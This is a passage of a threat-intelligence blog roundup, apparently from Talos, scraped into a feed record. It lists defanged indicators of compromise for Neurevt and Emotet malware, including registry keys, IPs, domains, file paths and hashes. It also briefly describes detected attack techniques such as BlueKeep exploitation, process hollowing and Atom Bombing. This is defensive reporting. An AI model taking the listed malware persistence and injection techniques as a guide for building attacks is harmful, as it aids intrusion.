\nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-guqbKk1KALI/XZdfmFc0OdI/AAAAAAAACuw/UIRzGpyFmhI9AVkph1Cak6NgjZCt6FQzQCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/--8eH6AJyv7o/XZdfqIKWukI/AAAAAAAACu0/Hp0eBDhQBFEcNMzAW2SyTgwtyVNez_9MwCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-nbuUH19K8pI/XZdfvUc-nEI/AAAAAAAACu4/kaNc2n968KcIf10r_b-23kAiLkcpYN1jACLcBGAsYHQ/s1600/c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Neurevt-7192122-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WIN7ZIP \nValue Name: Uuid ` | 26 \n`<HKCU>\\SOFTWARE\\WIN7ZIP ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\PUBLICPROFILE \nValue Name: EnableFirewall ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SSDPSRV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RSTRUI.EXE ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RSTRUI.EXE \nValue Name: Debugger ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: random ` | 2 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\10DF0332\\CG1 \nValue Name: GLA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\OMYLCQKSW.EXE \nValue Name: Debugger ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CS1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CW1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CW1 \nValue Name: 1916 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Javaupdate ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CG1 \nValue Name: GLA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\BZSBKOTIU.EXE \nValue Name: Debugger ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CS1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CW1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CG1 ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 9 \n`52[.]185[.]71[.]28` | 5 \n`208[.]100[.]26[.]251` | 1 \n`40[.]76[.]4[.]15` | 1 \n`20[.]41[.]46[.]145` | 1 \n`40[.]67[.]189[.]14` | 1 \n`94[.]130[.]148[.]39` | 1 \n`176[.]56[.]236[.]180` | 1 \n`143[.]215[.]215[.]205` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`update-silo[.]com` | 1 \n`frizzcams[.]com` | 1 \n`fapncam[.]com` | 1 \n`theafam[.]info` | 1 \n`pl1[.]co[.]vu` | 1 \n`kasn5[.]name` | 1 \n`up-windows[.]in` | 1 \n`myssfii[.]eu` | 1 \n`emicrosoft[.]eu` | 1 \n`allegro[.]ga` | 1 \n`frky7[.]name` | 1 \n`marklou1[.]eu` | 1 \n`s1allegro[.]net` | 1 \n`b[.]dqwjnewkwefewaaaaa3[.]com` | 1 \n`fe298c697c247af42926ae65f504cbab[.]380d71f68b776c687229362c8017cfd4[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]2uandmearevideos2k2[.]com` | 1 \n`e4afed3b6057875d3cab2c8acadf19b0[.]9079efdb6bd50d249cecbf60d0cf8a59[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]12thegamejuststarted10k12[.]com` | 1 \n`9f1338aaa955b14adce82b28456563dd[.]8e38e1a12b675dd8ad0879ac9df9dd43[.]sink1[.]doombringer[.]pw` | 1 \n`0a3871225132117b6a5a3ca80e3637e7[.]bd822b74f0f09fe15387a4e573dfd4b8[.]sink1[.]doombringer[.]pw` | 1 \n`5fa5dd9e6db7852950c1d75652840205[.]d30bfb82739133ccfd1a869f816afd1e[.]sink1[.]doombringer[.]pw` | 1 \n`a289b7027c3a8ccd97e35492ec62c4a7[.]79c70407c7e6ecfca660191065cb2e91[.]sink1[.]doombringer[.]pw` | 1 \n`82ffe6077d09c53372a2f4177b3a00fd[.]2418805ba4dbdf2b323c3ee2d28fd899[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]6worldwipemek6[.]com` | 1 \n`ce5ccbd7434dc4f3e00d5d615c8f1cfe[.]f919bc55f255fc49078e2b0e54e60b5e[.]sink1[.]doombringer[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\My Documents\\My Videos\\Desktop.ini` | 18 \n`%System32%\\Tasks\\Windows Update Check - 0x00000000` | 17 \n`%ProgramData%\\riaiccape` | 3 \n`%ProgramData%\\riaiccape\\desktop.ini` | 3 \n`%ProgramData%\\ubvhynpxh` | 2 \n`%ProgramData%\\ubvhynpxh\\desktop.ini` | 2 \n`%ProgramData%\\hemxccape` | 2 \n`%ProgramData%\\hemxccape\\desktop.ini` | 2 \n`%ProgramData%\\randomfolder\\desktop.ini` | 2 \n`%ProgramData%\\rpeulaaql\\desktop.ini` | 1 \n`%ProgramData%\\odoaztybt\\desktop.ini` | 1 \n`%ProgramData%\\mwvaztybt\\desktop.ini` | 1 \n`%ProgramData%\\safpdndnn\\desktop.ini` | 1 \n`%ProgramData%\\Javaupdate\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x6EDA084A` | 1 \n`%ProgramData%\\dtdasndku\\desktop.ini` | 1 \n`%ProgramData%\\Winrar_Update\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x6E3308B1` | 1 \n`%ProgramData%\\omylcqksw\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x5FF907D6` | 1 \n`%ProgramData%\\svchost\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x19CF045A` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x0E7302EC` | 1 \n`%ProgramData%\\skskjbpjx\\desktop.ini` | 1 \n \n#### File Hashes\n\n` 00922eea9dc5d3b1d91cf0e5b244d86957e0a5dab9f22b37db91983d154849f5 00e830529982d3b12b63616473f8e77b1e9f59d26d7464a916ab4ccb7d252338 0f9b382f50574eb1da03ab59cc0138d0cdddbcccdbf4fb04377235377e2bce60 19a17d03eaa9d66aee48704b368513cb4ce2ea571004561046897e5fe194fcb5 1d5a814d7034b2ffc16acb036e10021410d1592b491fd4e3c6737ffa48c19f55 205a780668f504064a7a326217529d3dd585fefe2c91b9ee141aa0c0411c88d6 2252337eb1ee8bfcdc05cdd90533c4f9c73326c3c38438730feffb47a67dde13 228cdf170c3b7f8c4b08f89def8b979c147aada601d7e1d0708916a3101732fc 23b79c36c6c5b9b35e11159486bf8f1e0a2366af780c9508bfee93de63fdeb86 2b55f40e873b564258185612ea6518761ab9393f271d1acd3908d65dda91c3f2 2d6b0b02396b515544d508ace60ef5de186961843c6fda12c311716c63b631b4 47fce8ed6989d5946ef8b4a10898d103ded7ffe6d5046d1583aefa21218cbe49 48b4df7d8192fb653ca5d4ef80903794b6cf7baa25bca70624acbcafd1c5f4e1 514e41ef73aa0e6b581168304fc5e4c11a81706d4a00e8dadd8c5e604493e85f 5822b7304c297b694c9826e07c653d1a5071af711f24abf374213dbf73df99d8 69808dfac8e39bb71644ca5b9a354c8407d713e723c49a2bb54ba6a6f54e52d3 699b83596749933b26e4a8cd79df7e961859dce598a28b0a09a7d1a6ef051ba5 714042e00adf37f5772ade261d283e66bfd787ba4622ff188ec9befc05817bcb 82fd5b23902d7114095c356c9820e65b89d7c4dd5da1312e262373608e536e4e 8f0ab0d5a8d06ffb54e69dec00c3d2e920794be65cb3b9f316a04af9c3d3ed35 96e0342a3295906bf604f8fcffb8845e3d4a72ceb8ca34443f54216616467ddc 97f3a82738d8dc6703828c406ecafd16acbc019bf8c810516912302ec1d2b553 a925cb47ff812a85faee0d1a39c2f16ac6b99dff405d01741fc253ec76cf29aa ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34 aee901442f82ad32986e1c36969d48d76d4cc88bb8b084d0a2749220a86a26b5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YjM6h_iViKQ/XZdgApm3B4I/AAAAAAAACvE/iXocebKpt1UWw4GrvlYHiQt7OBUD0XPXQCLcBGAsYHQ/s1600/ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-MjIQO5o6YDA/XZdgEz0zepI/AAAAAAAACvI/ilSTAIiY7nwrkGqqspWiBafNY9ebwNpagCLcBGAsYHQ/s1600/ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Dropper.Emotet-7181950-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.JS\\OPENWITHPROGIDS \nValue Name: JSFile ` | 38 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.JS ` | 38 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.JS\\OPENWITHPROGIDS ` | 38 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.JS\\OPENWITHLIST ` | 38 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\RECOVER \nValue Name: Name ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\RECOVER \nValue Name: Path ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\RECOVER \nValue Name: Extensions ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WRDPRFCTDOS \nValue Name: Name ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WRDPRFCTDOS \nValue Name: Path ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WRDPRFCTDOS \nValue Name: Extensions ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WORDPERFECT6X \nValue Name: Name ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WORDPERFECT6X \nValue Name: Path ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WORDPERFECT6X \nValue Name: Extensions ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: Type ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: Start ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: ErrorControl ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: ImagePath ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: DisplayName ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: WOW64 ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\YELLOWREPORTS \nValue Name: ObjectName ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\RECOVER ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WRDPRFCTDOS ` | 37 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\OFFICE\\14.0\\WORD\\TEXT CONVERTERS\\IMPORT\\WORDPERFECT6X ` | 37 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 37 \n`Global\\M98B68E3C` | 37 \n`Global\\M3C28B0E4` | 19 \n`Global\\I3C28B0E4` | 19 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`181[.]123[.]0[.]125` | 15 \n`18[.]217[.]99[.]164` | 15 \n`119[.]159[.]150[.]176` | 13 \n`80[.]240[.]141[.]141` | 13 \n`184[.]69[.]214[.]94` | 13 \n`186[.]75[.]241[.]230` | 11 \n`124[.]240[.]198[.]66` | 11 \n`209[.]182[.]195[.]22` | 9 \n`173[.]194[.]68[.]108/31` | 8 \n`69[.]43[.]168[.]232` | 8 \n`104[.]31[.]71[.]182` | 8 \n`110[.]36[.]234[.]146` | 8 \n`197[.]211[.]244[.]6` | 8 \n`125[.]99[.]61[.]162` | 8 \n`115[.]88[.]70[.]226` | 8 \n`207[.]204[.]50[.]44` | 7 \n`217[.]116[.]0[.]228` | 7 \n`162[.]251[.]80[.]26` | 6 \n`104[.]31[.]70[.]182` | 6 \n`72[.]167[.]238[.]29` | 5 \n`74[.]208[.]5[.]15` | 5 \n`196[.]25[.]211[.]150` | 5 \n`17[.]36[.]205[.]74` | 5 \n`217[.]116[.]0[.]237` | 5 \n`148[.]72[.]198[.]247` | 5 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`themodifiedzone[.]com` | 15 \n`www[.]pics4game[.]com` | 14 \n`www[.]creativespad[.]com` | 9 \n`smtpout[.]secureserver[.]net` | 8 \n`smtp[.]secureserver[.]net` | 7 \n`mail[.]secureserver[.]net` | 6 \n`mail[.]apnabazar[.]co[.]in` | 6 \n`smtp[.]1and1[.]es` | 5 \n`smtp[.]mail[.]com` | 5 \n`pop[.]secureserver[.]net` | 5 \n`secure[.]emailsrvr[.]com` | 5 \n`mail[.]heraldsopenaccess[.]com` | 5 \n`mail[.]heraldsopenaccess[.]us` | 5 \n`smtp[.]mail[.]me[.]com` | 4 \n`pop3[.]telkomsa[.]net` | 4 \n`smtp[.]telkomsa[.]net` | 4 \n`outlook[.]office365[.]com` | 4 \n`smtp[.]orange[.]fr` | 4 \n`remote[.]jubileelife[.]com` | 4 \n`mail[.]keycargroup[.]es` | 4 \n`server[.]isnstores[.]com` | 4 \n`mail[.]r10networks[.]com` | 4 \n`smtp-mail[.]outlook[.]com` | 3 \n`smtp[.]comcast[.]net` | 3 \n`mail[.]rediffmailpro[.]com` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\Microsoft\\Schemas\\MS Word_restart.xml` | 38 \n`%TEMP%\\0.7055475.js` | 38 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 38 \n`%System32%\\adjustmove.exe (copy)` | 19 \n`%SystemRoot%\\SysWOW64\\yellowreportsb.exe` | 5 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 4 \n`%TEMP%\\inq6vpuc4.exe` | 1 \n`%TEMP%\\llh1np4ba.exe` | 1 \n`%TEMP%\\x5ra7abr9.exe` | 1 \n`%TEMP%\\tlcebiev2.exe` | 1 \n`%TEMP%\\qy2w0i9c1.exe` | 1 \n`%TEMP%\\jrtj6nk6o.exe` | 1 \n`%TEMP%\\fe2zt4mrb.exe` | 1 \n`%TEMP%\\zmmkb0j7x.exe` | 1 \n`%TEMP%\\ns8q8axim.exe` | 1 \n`%TEMP%\\s1ucq6p8d.exe` | 1 \n`%TEMP%\\fxmnkq4qt.exe` | 1 \n`%TEMP%\\4l4u8k8s6.exe` | 1 \n`%TEMP%\\lvn7pj1tq.exe` | 1 \n`%TEMP%\\qz03ja0fx.exe` | 1 \n`%TEMP%\\o2a6n5yed.exe` | 1 \n`%TEMP%\\h04mv88ph.exe` | 1 \n`%TEMP%\\9m0sfw639.exe` | 1 \n`%TEMP%\\waymo412t.exe` | 1 \n`%TEMP%\\9611f6amr.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 04506f92dbebbdad34850d0344014c9acf170a1f532660d18512975d62756fbd 16a9929e17b9fcc99f8d2eb5ec86b365239b0f957b187594f77319540ce5e5f1 1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a 1be7caaba5194edf4387892d03521e968be5fa4b784a833b0c6321285694a660 1cfe976389fe9d737b7419de0fac59fa4dce4e78c73714124b1689011e3ce732 1f8d4a7a30a8f819c87095b98c10328764b56a877915105815442f4192804571 26706d48f23fdb7c40aca350271921e8050870ce4f6d957d94ad308dd3f409a2 298762d4a2ff39b2de5427c13ff95e75a4f4ac07b5f64c46d82ee1043fc52ed8 2b05fd27faf1cc06b2db7e25b67e19ce5ff5c7852e61bf122eaae92345b54a77 2e8ec9034066e25159978c9c8429e0b2762a2e193a48a0d14fe5a45518c5b5a8 3643f64d1633ebca53e1f94f6aba030cc495b68942b532afae9c74f8016d631f 4331d5382007c68ac994c5a45e86985d8fcde1fb478aa69b394a19058d807f67 471ebd4880bf8cfee1920152ea36f170cf9331f37e45bf52f5b9bcfcbd326ffb 4781987ed5962518144b03612044b8dea7e5a29107a2ad2f7a2c0738313586ee 4e2f28c6260342e1d56264f6cb861d81987fff70905700660034a240c59d75d9 4ebd8502f68223342be072867f79338fb13dfe6b68b209bfdb27f5effef40d05 5fae5b96569a4759bd5cc6494b24edef1639bcc28ed105bc3eb8f9fa09bca4c9 7362434686fb62fe3ce77a4ea84886f0f82768112b6f9832cc86bbdfc83bdef9 7c067959175e72df745b86f91dd1fa402f4b3b3c0ad17ca70b77a1f6185a285c 7d06e0759eafca0709823dadb15c5d37c7a3cada38bad9bcb4ca678d3895bfb0 807cfe5cb5d6075af492a911fd096b0a3705f9fe7cd0a7263d94e4efa21a50f4 857f05b3df88059eeeaecea4da6901ad6e45e5cbb9be21d1ae7d17b946cba355 86c47685c49f4d0cec1c54b0b6cc8247ebd8c17b01a63da2ac19c0b02d426ebd 89763a9eefa6606d925392aa2718facb16958916ee2564025edcd1d74712536b a0703d7150ce06752f04e53ea2ad6f102551e1bdb8588fdc2e6bf90668e1de7e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-aQErGUAhErk/XZdgZaFekrI/AAAAAAAACvU/S3GztfUrhPYfx0lPCSJMlPYzov4RBdJGgCLcBGAsYHQ/s1600/1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-kFR2e9IlZIw/XZdgfz8BCkI/AAAAAAAACvY/8IDMucgOCmMR65yFbs8VaBK_wan-P1-0wCLcBGAsYHQ/s1600/1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-wbN8tgIUNvE/XZdgl3FBj2I/AAAAAAAACvc/71dEQOv_7RQt3gNa7LWby2xSZTOGTiiSQCLcBGAsYHQ/s1600/1be7caaba5194edf4387892d03521e968be5fa4b784a833b0c6321285694a660_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-CjwR3PfrNwA/XZdgr8w6I5I/AAAAAAAACvk/48tfCNUJ0z4sRm_-IuhsH00lo9q38Z_FwCLcBGAsYHQ/s1600/16a9929e17b9fcc99f8d2eb5ec86b365239b0f957b187594f77319540ce5e5f1_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (12639) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (5242) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nMadshi injection detected \\- (2444) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (933) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (443) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nAtom Bombing code injection technique detected \\- (389) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nGamarue malware detected \\- (195) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (186) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nTrickbot malware detected \\- (174) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nInstallcore adware detected \\- (116) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "modified": "2019-10-04T08:37:35", "published": "2019-10-04T08:37:35", "id": "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6x7noS5KGzQ/threat-roundup-for-september-27-to.html", "type": "talosblog", "title": "Threat Roundup for September 27 to October 4", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T18:23:53", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 15 and Nov. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Downloader.Nymaim-7391562-0 | Downloader | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Trojan.Bunitu-7394346-0 | Trojan | Bunitu is malware that establishes a persistent foothold on an infected machine and then turns it into a proxy for criminal VPN services. 